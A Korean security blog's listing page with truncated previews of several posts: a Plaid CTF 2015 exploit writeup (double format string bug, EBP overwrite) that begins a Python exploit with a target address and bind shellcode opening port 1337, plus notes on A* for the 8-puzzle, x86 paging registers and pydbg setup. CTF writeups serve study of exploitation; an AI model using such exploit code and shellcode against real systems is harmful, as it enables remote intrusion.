반응형 blackcon157 [exploit] Plaid CTF 2015 EBP writeup [+] keyword : double format string bug, overwrite ebp [!] 코드가 많이 복잡합니다 ㅎㅎ 그래도 코드만 올릴게요 :D [!] 쉘코드는 bind shellcode를 이용하여 1337번 포트로 재접속하는 쉘코드를 사용했습니다. #!/usr/bin/env python import struct import socket import time import telnetlib p = lambda x: struct.pack( "I", x )[0] host = "52.6.64.173" port = 4545 # bind shellcode # ip : 0.0.0.0, port : 1337 shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" sh.. 2015. 4. 24. [인공지능] A* 알고리즘을 이용한 8-puzzle 만들기 초보자를 위한 A* 알고리즘 (기초개념 설명 및 소스) 참고 - http://egloos.zum.com/cozycoz/v/9748811 8-puzzle에서의 F, G, H값과 열린노드, 닫힌노드 간략한 설명 1) F = G + H, 열린 노드중에서 F값이 최소인 경우를 선택하여 이동한다. 2) G = 현재까지 이동한 횟수 - H = 목표 노드와 현재노드를 비교하여 맞지 않는 노드의 개수 - 열린 노드 : 현재 빈 공간에서 상, 하, 좌, 우 중 갈 수있는 방향을 설정(이때 부모 노드의 위치도 함께저장한다.) - 닫힌 노드 : 이동하기 전의 현재 위치를 저장( 이동한 이후에 월래자리로 돌아가지 않게하기 위함이다.) 8 puzzle 결과 8 puzzle 소스코드 /************************.. 2015. 4. 4. 커널&페이징 관련 간단히 메모 PTE : Page Table Entry - 프로세스의 페이지 정보를 담고있는 테이블이다. - Page 기본주소, 플래그 비트(접근비트, 현재비트, 변경비트, 읽기/쓰기 비트) 저장한다. PAE : Physical Address Extension, 물리 주소 확장 - 32bit환경에서는 4Gbyte이상의 메모리가 있어도 제대로 활용을 못한다. - 하지만 PAE기능으로 그 이상의 메모리가 사용가능하다. - 32bit == 2^32 == 4,294,967,296 == 4G byte - cr4 register가 설정됨으로써 PAE가 설정된다. CR0 The CR0 32-bit register has 6 bits that are of interest to us. The low 5 bits of the CR0 r.. 2015. 2. 11. pydbg설치 참고 사이트 http://i5on9i.blogspot.kr/2012/07/pydbg-pydasmpyd.htmlhttp://k1rha.tistory.com/entry/파이썬-해킹-프로그래밍-퍼저-환경-구축하기-pydbg-설치하기http://southpawzz.egloos.com/viewer/5079484 windows 64bit pydbg : https://github.com/gdbinit/pydbg64 2014. 11. 29. 이전 1 ··· 14 15 16 17 18 19 20 ··· 40 다음 728x90
